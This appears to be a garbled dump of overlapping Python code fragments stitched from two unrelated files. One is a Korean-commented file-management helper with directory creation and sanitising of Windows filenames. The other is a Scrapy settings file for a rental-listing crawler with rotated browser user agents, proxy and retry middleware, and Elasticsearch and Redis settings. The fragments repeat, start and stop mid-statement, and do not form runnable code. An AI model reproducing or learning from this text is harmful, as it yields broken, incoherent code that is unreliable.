while True: try: if os.path.isdir(path_dir)", "open(file, 'w', encoding='utf-8') as f: f.write(content) self.save_cnt += 1 return True def get_default_dir_file_list(self):", "= self.dirname / ''.join([basename, get_extension(language)]) if os.path.isfile(file): # print(f'이미 존재!: {basename}') return False", "mkdir_if_not_exists(path_dir: str): while True: try: if os.path.isdir(path_dir) is False: os.mkdir(path_dir) except FileNotFoundError: mkdir_if_not_exists(", "+= 1 return True def get_default_dir_file_list(self): return os.listdir(self.dirname) def mkdir_if_not_exists(path_dir: str): while True:", "문자열 :return: 특수문자가 제거된 문자열 \"\"\" return sub('[\\\\\\/:*?\"<>|]', '', before_str) def get_file_dirname(file_path): return", "get_extension import os.path from re import sub # 상위 디렉토리 경로 BASE_DIR =", "get_default_dir_file_list(self): return os.listdir(self.dirname) def mkdir_if_not_exists(path_dir: str): while True: try: if os.path.isdir(path_dir) is False:", ":return: 특수문자가 제거된 문자열 \"\"\" return sub('[\\\\\\/:*?\"<>|]', '', before_str) def get_file_dirname(file_path): return os.path.dirname(os.path.abspath(file_path))", "FileManager(object): default_dir = '_downloads' # 파일을 저장할 기본 디렉토리 save_cnt = 0 #", "디렉토리 save_cnt = 0 # 파일 저장 카운트 def __init__(self, *dirs): self.dirname =", "else: return def remove_win_special_char(before_str): \"\"\" windows에서 파일명으로 사용하지 못하는 특수문자 제거 :param before_str:", "from pathlib import Path from modules.languages import get_extension import os.path from re import", "else: with open(file, 'w', encoding='utf-8') as f: f.write(content) self.save_cnt += 1 return True", "try: if os.path.isdir(path_dir) is False: os.mkdir(path_dir) except FileNotFoundError: mkdir_if_not_exists( os.path.abspath(os.path.join(path_dir, os.pardir))) else: return", "''.join([basename, get_extension(language)]) if os.path.isfile(file): # print(f'이미 존재!: {basename}') return False else: with open(file,", "<reponame>leeyongjoo/algorithm-problem-automation<gh_stars>0 from pathlib import Path from modules.languages import get_extension import os.path from re", "re import sub # 상위 디렉토리 경로 BASE_DIR = Path(__file__).resolve(strict=True).parent.parent class FileManager(object): default_dir", "파일 저장 카운트 def __init__(self, *dirs): self.dirname = BASE_DIR / self.default_dir / '/'.join(*dirs)", "존재!: {basename}') return False else: with open(file, 'w', encoding='utf-8') as f: f.write(content) self.save_cnt", "카운트 def __init__(self, *dirs): self.dirname = BASE_DIR / self.default_dir / '/'.join(*dirs) mkdir_if_not_exists(self.dirname) def", "return True def get_default_dir_file_list(self): return os.listdir(self.dirname) def mkdir_if_not_exists(path_dir: str): while True: try: if", "= remove_win_special_char(name) file = self.dirname / ''.join([basename, get_extension(language)]) if os.path.isfile(file): # print(f'이미 존재!:", "as f: f.write(content) self.save_cnt += 1 return True def get_default_dir_file_list(self): return os.listdir(self.dirname) def", "# 파일 저장 카운트 def __init__(self, *dirs): self.dirname = BASE_DIR / self.default_dir /", "import os.path from re import sub # 상위 디렉토리 경로 BASE_DIR = Path(__file__).resolve(strict=True).parent.parent", "file = self.dirname / ''.join([basename, get_extension(language)]) if os.path.isfile(file): # print(f'이미 존재!: {basename}') return", "기본 디렉토리 save_cnt = 0 # 파일 저장 카운트 def __init__(self, *dirs): self.dirname", "제거 :param before_str: 문자열 :return: 특수문자가 제거된 문자열 \"\"\" return sub('[\\\\\\/:*?\"<>|]', '', before_str)", "False else: with open(file, 'w', encoding='utf-8') as f: f.write(content) self.save_cnt += 1 return", "def remove_win_special_char(before_str): \"\"\" windows에서 파일명으로 사용하지 못하는 특수문자 제거 :param before_str: 문자열 :return:", "is False: os.mkdir(path_dir) except FileNotFoundError: mkdir_if_not_exists( os.path.abspath(os.path.join(path_dir, os.pardir))) else: return def remove_win_special_char(before_str): \"\"\"", "def get_default_dir_file_list(self): return os.listdir(self.dirname) def mkdir_if_not_exists(path_dir: str): while True: try: if os.path.isdir(path_dir) is", "basename = remove_win_special_char(name) file = self.dirname / ''.join([basename, get_extension(language)]) if os.path.isfile(file): # print(f'이미", "{basename}') return False else: with open(file, 'w', encoding='utf-8') as f: f.write(content) self.save_cnt +=", "os.path.isfile(file): # print(f'이미 존재!: {basename}') return False else: with open(file, 'w', encoding='utf-8') as", "from modules.languages import get_extension import os.path from re import sub # 상위 디렉토리", "windows에서 파일명으로 사용하지 못하는 특수문자 제거 :param before_str: 문자열 :return: 특수문자가 제거된 문자열", "\"\"\" windows에서 파일명으로 사용하지 못하는 특수문자 제거 :param before_str: 문자열 :return: 특수문자가 제거된", "import sub # 상위 디렉토리 경로 BASE_DIR = Path(__file__).resolve(strict=True).parent.parent class FileManager(object): default_dir =", "name, content, language) -> bool: basename = remove_win_special_char(name) file = self.dirname / ''.join([basename,", "= BASE_DIR / self.default_dir / '/'.join(*dirs) mkdir_if_not_exists(self.dirname) def write_file(self, name, content, language) ->", "BASE_DIR / self.default_dir / '/'.join(*dirs) mkdir_if_not_exists(self.dirname) def write_file(self, name, content, language) -> bool:", "def __init__(self, *dirs): self.dirname = BASE_DIR / self.default_dir / '/'.join(*dirs) mkdir_if_not_exists(self.dirname) def write_file(self,", "bool: basename = remove_win_special_char(name) file = self.dirname / ''.join([basename, get_extension(language)]) if os.path.isfile(file): #", "return def remove_win_special_char(before_str): \"\"\" windows에서 파일명으로 사용하지 못하는 특수문자 제거 :param before_str: 문자열", "1 return True def get_default_dir_file_list(self): return os.listdir(self.dirname) def mkdir_if_not_exists(path_dir: str): while True: try:", "while True: try: if os.path.isdir(path_dir) is False: os.mkdir(path_dir) except FileNotFoundError: mkdir_if_not_exists( os.path.abspath(os.path.join(path_dir, os.pardir)))", "class FileManager(object): default_dir = '_downloads' # 파일을 저장할 기본 디렉토리 save_cnt = 0", "self.dirname = BASE_DIR / self.default_dir / '/'.join(*dirs) mkdir_if_not_exists(self.dirname) def write_file(self, name, content, language)", "'/'.join(*dirs) mkdir_if_not_exists(self.dirname) def write_file(self, name, content, language) -> bool: basename = remove_win_special_char(name) file", "= 0 # 파일 저장 카운트 def __init__(self, *dirs): self.dirname = BASE_DIR /", "os.mkdir(path_dir) except FileNotFoundError: mkdir_if_not_exists( os.path.abspath(os.path.join(path_dir, os.pardir))) else: return def remove_win_special_char(before_str): \"\"\" windows에서 파일명으로", "save_cnt = 0 # 파일 저장 카운트 def __init__(self, *dirs): self.dirname = BASE_DIR", "write_file(self, name, content, language) -> bool: basename = remove_win_special_char(name) file = self.dirname /", "modules.languages import get_extension import os.path from re import sub # 상위 디렉토리 경로", "except FileNotFoundError: mkdir_if_not_exists( os.path.abspath(os.path.join(path_dir, os.pardir))) else: return def remove_win_special_char(before_str): \"\"\" windows에서 파일명으로 사용하지", "sub # 상위 디렉토리 경로 BASE_DIR = Path(__file__).resolve(strict=True).parent.parent class FileManager(object): default_dir = '_downloads'", "False: os.mkdir(path_dir) except FileNotFoundError: mkdir_if_not_exists( os.path.abspath(os.path.join(path_dir, os.pardir))) else: return def remove_win_special_char(before_str): \"\"\" windows에서", "self.save_cnt += 1 return True def get_default_dir_file_list(self): return os.listdir(self.dirname) def mkdir_if_not_exists(path_dir: str): while", "import get_extension import os.path from re import sub # 상위 디렉토리 경로 BASE_DIR", "with open(file, 'w', encoding='utf-8') as f: f.write(content) self.save_cnt += 1 return True def", "경로 BASE_DIR = Path(__file__).resolve(strict=True).parent.parent class FileManager(object): default_dir = '_downloads' # 파일을 저장할 기본", "os.path from re import sub # 상위 디렉토리 경로 BASE_DIR = Path(__file__).resolve(strict=True).parent.parent class", "os.listdir(self.dirname) def mkdir_if_not_exists(path_dir: str): while True: try: if os.path.isdir(path_dir) is False: os.mkdir(path_dir) except", "*dirs): self.dirname = BASE_DIR / self.default_dir / '/'.join(*dirs) mkdir_if_not_exists(self.dirname) def write_file(self, name, content,", "remove_win_special_char(before_str): \"\"\" windows에서 파일명으로 사용하지 못하는 특수문자 제거 :param before_str: 문자열 :return: 특수문자가", "Path(__file__).resolve(strict=True).parent.parent class FileManager(object): default_dir = '_downloads' # 파일을 저장할 기본 디렉토리 save_cnt =", "'_downloads' # 파일을 저장할 기본 디렉토리 save_cnt = 0 # 파일 저장 카운트", "f: f.write(content) self.save_cnt += 1 return True def get_default_dir_file_list(self): return os.listdir(self.dirname) def mkdir_if_not_exists(path_dir:", "BASE_DIR = Path(__file__).resolve(strict=True).parent.parent class FileManager(object): default_dir = '_downloads' # 파일을 저장할 기본 디렉토리", "파일명으로 사용하지 못하는 특수문자 제거 :param before_str: 문자열 :return: 특수문자가 제거된 문자열 \"\"\"", "/ '/'.join(*dirs) mkdir_if_not_exists(self.dirname) def write_file(self, name, content, language) -> bool: basename = remove_win_special_char(name)", "os.path.abspath(os.path.join(path_dir, os.pardir))) else: return def remove_win_special_char(before_str): \"\"\" windows에서 파일명으로 사용하지 못하는 특수문자 제거", "상위 디렉토리 경로 BASE_DIR = Path(__file__).resolve(strict=True).parent.parent class FileManager(object): default_dir = '_downloads' # 파일을", "mkdir_if_not_exists( os.path.abspath(os.path.join(path_dir, os.pardir))) else: return def remove_win_special_char(before_str): \"\"\" windows에서 파일명으로 사용하지 못하는 특수문자", "self.dirname / ''.join([basename, get_extension(language)]) if os.path.isfile(file): # print(f'이미 존재!: {basename}') return False else:", "= Path(__file__).resolve(strict=True).parent.parent class FileManager(object): default_dir = '_downloads' # 파일을 저장할 기본 디렉토리 save_cnt", "못하는 특수문자 제거 :param before_str: 문자열 :return: 특수문자가 제거된 문자열 \"\"\" return sub('[\\\\\\/:*?\"<>|]',", "import Path from modules.languages import get_extension import os.path from re import sub #", "os.path.isdir(path_dir) is False: os.mkdir(path_dir) except FileNotFoundError: mkdir_if_not_exists( os.path.abspath(os.path.join(path_dir, os.pardir))) else: return def remove_win_special_char(before_str):", "default_dir = '_downloads' # 파일을 저장할 기본 디렉토리 save_cnt = 0 # 파일", "if os.path.isfile(file): # print(f'이미 존재!: {basename}') return False else: with open(file, 'w', encoding='utf-8')", "디렉토리 경로 BASE_DIR = Path(__file__).resolve(strict=True).parent.parent class FileManager(object): default_dir = '_downloads' # 파일을 저장할", "f.write(content) self.save_cnt += 1 return True def get_default_dir_file_list(self): return os.listdir(self.dirname) def mkdir_if_not_exists(path_dir: str):" ]
[ "9.0; en-US)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET", "= { 'house_renting.pipelines.HouseRentingPipeline': 100, 'house_renting.pipelines.DuplicatesPipeline': 200, 'scrapy.pipelines.images.ImagesPipeline': 300, 'house_renting.pipelines.ESPipeline': 400, } IMAGES_STORE =", "Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR '", "case of high latencies AUTOTHROTTLE_MAX_DELAY = 10 # The average number of requests", "'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727;", "AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR ' '2.0.50727)', 'Mozilla/5.0", "Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR ' '2.0.50727)', 'Mozilla/5.0 (Windows; U;", "1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser;", "MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',", "'en', } SPIDER_MIDDLEWARES = { } DOWNLOADER_MIDDLEWARES = { 'house_renting.middlewares.HouseRentingAgentMiddleware': 100, 'house_renting.middlewares.HouseRentingProxyMiddleware': 200,", "WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11', 'Mozilla/5.0 (Macintosh; Intel Mac OS X", "}, } # ES 节点, 可以配置多个节点(集群), 默认为 None, 不会存储到 ES ELASTIC_HOSTS = [", "NEWSPIDER_MODULE = 'house_renting.spiders' USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15", "Enable showing throttling stats for every response received: AUTOTHROTTLE_DEBUG = True DOWNLOAD_TIMEOUT =", "(KHTML, like Gecko) Version/11.1 ' \\ 'Safari/605.1.15 ' USER_AGENTS = ( 'Mozilla/4.0 (compatible;", "SPIDER_SETTINGS = { 'lianjia': { 'cities': lianjia.cities, 'available_cities': lianjia.available_cities, 'available_cities_map': lianjia.available_cities_map, }, '58':", "The initial download delay AUTOTHROTTLE_START_DELAY = 10 # The maximum download delay to", "to be set in case of high latencies AUTOTHROTTLE_MAX_DELAY = 10 # The", "300, 'scrapy.downloadermiddlewares.retry.RetryMiddleware': None, 'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': None, } ITEM_PIPELINES = { 'house_renting.pipelines.HouseRentingPipeline': 100, 'house_renting.pipelines.DuplicatesPipeline': 200,", "'house_renting.pipelines.DuplicatesPipeline': 200, 'scrapy.pipelines.images.ImagesPipeline': 300, 'house_renting.pipelines.ESPipeline': 400, } IMAGES_STORE = '/house-renting/data/images' MEDIA_ALLOW_REDIRECTS = True", "'Change: 287 c9dfb30)', 'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3)", "a58.available_cities_map, }, } # ES 节点, 可以配置多个节点(集群), 默认为 None, 不会存储到 ES ELASTIC_HOSTS =", "Version/11.52', ) ROBOTSTXT_OBEY = False DOWNLOAD_DELAY = 10 CONCURRENT_REQUESTS_PER_DOMAIN = 1 COOKIES_ENABLED =", "'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52', ) ROBOTSTXT_OBEY", "1.1.4322; .NET CLR ' '2.0.50727)', 'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0;", "Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 ' \\ 'Safari/605.1.15 '", "9.0; Windows NT 9.0; en-US)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64;", "True DOWNLOAD_TIMEOUT = 30 RETRY_TIMES = 3 LOG_LEVEL = 'INFO' SPIDER_SETTINGS = {", "Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6', 'Mozilla/5.0 (Windows; U; Windows NT", "ES 节点, 可以配置多个节点(集群), 默认为 None, 不会存储到 ES ELASTIC_HOSTS = [ {'host': 'elastic', 'port':", "CONCURRENT_REQUESTS_PER_DOMAIN = 1 COOKIES_ENABLED = False TELNETCONSOLE_ENABLED = False DEFAULT_REQUEST_HEADERS = { 'Accept':", ".NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1;", "SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; ' '.NET CLR 3.0.04506)', 'Mozilla/4.0", "CLR 2.0.50727; InfoPath.2; .NET CLR ' '3.0.04506.30)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1;", "Gecko) Version/11.1 ' 'Safari/605.1.15', 'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr)", "5.1; .NET CLR 1.1.4322; .NET CLR ' '2.0.50727)', 'Mozilla/5.0 (Windows; U; MSIE 9.0;", "CLR 3.5.30729; .NET CLR ' '3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)',", "{ 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en', } SPIDER_MIDDLEWARES = { } DOWNLOADER_MIDDLEWARES = {", "Gecko/20070215 K-Ninja/2.1.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0',", "AUTOTHROTTLE_MAX_DELAY = 10 # The average number of requests Scrapy should be sending", "every response received: AUTOTHROTTLE_DEBUG = True DOWNLOAD_TIMEOUT = 30 RETRY_TIMES = 3 LOG_LEVEL", "USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko)", ".NET CLR ' '2.0.50727)', 'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)',", "Gecko, Safari/419.3) Arora/0.6', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1',", "'house_renting.middlewares.HouseRentingRetryMiddleware': 300, 'scrapy.downloadermiddlewares.retry.RetryMiddleware': None, 'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': None, } ITEM_PIPELINES = { 'house_renting.pipelines.HouseRentingPipeline': 100, 'house_renting.pipelines.DuplicatesPipeline':", "False DOWNLOAD_DELAY = 10 CONCURRENT_REQUESTS_PER_DOMAIN = 1 COOKIES_ENABLED = False TELNETCONSOLE_ENABLED = False", "Kazehakase/0.4.5', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6', 'Mozilla/5.0 (Windows", "Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (' 'Change: 287", "3 LOG_LEVEL = 'INFO' SPIDER_SETTINGS = { 'lianjia': { 'cities': lianjia.cities, 'available_cities': lianjia.available_cities,", "= 'house_renting.commands' SPIDER_MODULES = ['house_renting.spiders'] NEWSPIDER_MODULE = 'house_renting.spiders' USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel", "{ 'house_renting.middlewares.HouseRentingAgentMiddleware': 100, 'house_renting.middlewares.HouseRentingProxyMiddleware': 200, 'house_renting.middlewares.HouseRentingRetryMiddleware': 300, 'scrapy.downloadermiddlewares.retry.RetryMiddleware': None, 'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': None, } ITEM_PIPELINES", "MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center", "(KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20", "300, 'house_renting.pipelines.ESPipeline': 400, } IMAGES_STORE = '/house-renting/data/images' MEDIA_ALLOW_REDIRECTS = True # Enable and", "lianjia.cities, 'available_cities': lianjia.available_cities, 'available_cities_map': lianjia.available_cities_map, }, '58': { 'cities': a58.cities, 'available_cities': a58.available_cities, 'available_cities_map':", "(Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 ' \\", "Kapiko/3.0', 'Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5', 'Mozilla/5.0 (X11; U; Linux i686;", "ELASTIC_HOSTS = [ {'host': 'elastic', 'port': 9200}, ] REDIS_HOST = 'redis' # 默认为", "9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR '", "NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN;", "NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0', 'Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322", "AUTOTHROTTLE_START_DELAY = 10 # The maximum download delay to be set in case", "2.0.50727; ' '.NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR", "-*- coding: utf-8 -*- from house_renting.spider_settings import lianjia, a58 BOT_NAME = 'house_renting' COMMANDS_MODULE", "DOWNLOAD_DELAY = 10 CONCURRENT_REQUESTS_PER_DOMAIN = 1 COOKIES_ENABLED = False TELNETCONSOLE_ENABLED = False DEFAULT_REQUEST_HEADERS", ".NET CLR ' '3.0.04506.30)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML,", "OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52', ) ROBOTSTXT_OBEY = False DOWNLOAD_DELAY =", "'Accept-Language': 'en', } SPIDER_MIDDLEWARES = { } DOWNLOADER_MIDDLEWARES = { 'house_renting.middlewares.HouseRentingAgentMiddleware': 100, 'house_renting.middlewares.HouseRentingProxyMiddleware':", ".NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;", "(disabled by default) # See http://doc.scrapy.org/en/latest/topics/autothrottle.html AUTOTHROTTLE_ENABLED = True # The initial download", "Version/11.1 ' 'Safari/605.1.15', 'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168", "ES ELASTIC_HOSTS = [ {'host': 'elastic', 'port': 9200}, ] REDIS_HOST = 'redis' #", "Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52', ) ROBOTSTXT_OBEY = False DOWNLOAD_DELAY", "CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows", "CLR 2.0.50727; Media Center PC 6.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0;", "Media Center PC 5.0; ' '.NET CLR 3.0.04506)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL", "for every response received: AUTOTHROTTLE_DEBUG = True DOWNLOAD_TIMEOUT = 30 RETRY_TIMES = 3", "(Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 ' 'Safari/535.20',", "3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE", "Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 ' 'Safari/535.20', 'Mozilla/5.0", "like Gecko, Safari/419.3) Arora/0.3 (' 'Change: 287 c9dfb30)', 'Mozilla/5.0 (X11; U; Linux; en-US)", "= { 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en', } SPIDER_MIDDLEWARES = { } DOWNLOADER_MIDDLEWARES =", "5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0;", "'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)', 'Mozilla/5.0 (compatible; MSIE 9.0;", "8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; ' '.NET", "10 # The maximum download delay to be set in case of high", "' '3.0.04506.30)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko,", "CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR ' '3.0.04506.30)', 'Mozilla/5.0 (Windows; U;", "high latencies AUTOTHROTTLE_MAX_DELAY = 10 # The average number of requests Scrapy should", "like Gecko, Safari/419.3) Arora/0.6', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215", "= True # Enable and configure the AutoThrottle extension (disabled by default) #", "= 'INFO' SPIDER_SETTINGS = { 'lianjia': { 'cities': lianjia.cities, 'available_cities': lianjia.available_cities, 'available_cities_map': lianjia.available_cities_map,", "(Windows; U; MSIE 9.0; Windows NT 9.0; en-US)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows", "house_renting.spider_settings import lianjia, a58 BOT_NAME = 'house_renting' COMMANDS_MODULE = 'house_renting.commands' SPIDER_MODULES = ['house_renting.spiders']", "Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; ' '.NET CLR", "'available_cities': lianjia.available_cities, 'available_cities_map': lianjia.available_cities_map, }, '58': { 'cities': a58.cities, 'available_cities': a58.available_cities, 'available_cities_map': a58.available_cities_map,", "'available_cities': a58.available_cities, 'available_cities_map': a58.available_cities_map, }, } # ES 节点, 可以配置多个节点(集群), 默认为 None, 不会存储到", "Gecko/20070322 Kazehakase/0.4.5', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6', 'Mozilla/5.0", "The average number of requests Scrapy should be sending in parallel to #", "in case of high latencies AUTOTHROTTLE_MAX_DELAY = 10 # The average number of", "AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 ' 'Safari/605.1.15', 'Opera/9.80 (Macintosh; Intel Mac OS X", "USER_AGENTS = ( 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET", "{ 'lianjia': { 'cities': lianjia.cities, 'available_cities': lianjia.available_cities, 'available_cities_map': lianjia.available_cities_map, }, '58': { 'cities':", "sending in parallel to # each remote server AUTOTHROTTLE_TARGET_CONCURRENCY = 2.0 # Enable", "SPIDER_MODULES = ['house_renting.spiders'] NEWSPIDER_MODULE = 'house_renting.spiders' USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS", "NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; ' '.NET CLR 3.5.30729;", "3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT", "可以配置多个节点(集群), 默认为 None, 不会存储到 ES ELASTIC_HOSTS = [ {'host': 'elastic', 'port': 9200}, ]", "Enable and configure the AutoThrottle extension (disabled by default) # See http://doc.scrapy.org/en/latest/topics/autothrottle.html AUTOTHROTTLE_ENABLED", "MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET", ".NET CLR 1.1.4322; .NET CLR ' '2.0.50727)', 'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows", "CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET", "Arora/0.3 (' 'Change: 287 c9dfb30)', 'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like", "en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6', 'Mozilla/5.0 (Windows; U; Windows NT 5.1;", "7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC", "'house_renting.commands' SPIDER_MODULES = ['house_renting.spiders'] NEWSPIDER_MODULE = 'house_renting.spiders' USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac", "lianjia.available_cities_map, }, '58': { 'cities': a58.cities, 'available_cities': a58.available_cities, 'available_cities_map': a58.available_cities_map, }, } #", "'3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows", "287 c9dfb30)', 'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6',", "True # The initial download delay AUTOTHROTTLE_START_DELAY = 10 # The maximum download", "rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0", "in parallel to # each remote server AUTOTHROTTLE_TARGET_CONCURRENCY = 2.0 # Enable showing", "= 10 # The average number of requests Scrapy should be sending in", "U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6', 'Mozilla/5.0 (Windows; U; Windows", "'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 '", "The maximum download delay to be set in case of high latencies AUTOTHROTTLE_MAX_DELAY", "received: AUTOTHROTTLE_DEBUG = True DOWNLOAD_TIMEOUT = 30 RETRY_TIMES = 3 LOG_LEVEL = 'INFO'", "AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT", "'house_renting' COMMANDS_MODULE = 'house_renting.commands' SPIDER_MODULES = ['house_renting.spiders'] NEWSPIDER_MODULE = 'house_renting.spiders' USER_AGENT = 'Mozilla/5.0", "of high latencies AUTOTHROTTLE_MAX_DELAY = 10 # The average number of requests Scrapy", "SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows", "by default) # See http://doc.scrapy.org/en/latest/topics/autothrottle.html AUTOTHROTTLE_ENABLED = True # The initial download delay", "WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; ' '.NET CLR 3.5.30729; .NET CLR 3.0.30729;", "CLR 2.0.50727; ' '.NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET", "CLR 3.0.04506)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1;", "'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': None, } ITEM_PIPELINES = { 'house_renting.pipelines.HouseRentingPipeline': 100, 'house_renting.pipelines.DuplicatesPipeline': 200, 'scrapy.pipelines.images.ImagesPipeline': 300, 'house_renting.pipelines.ESPipeline':", "MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR", ".NET CLR 1.0.3705; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2;", "i686; U;) Gecko/20070322 Kazehakase/0.4.5', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10", "parallel to # each remote server AUTOTHROTTLE_TARGET_CONCURRENCY = 2.0 # 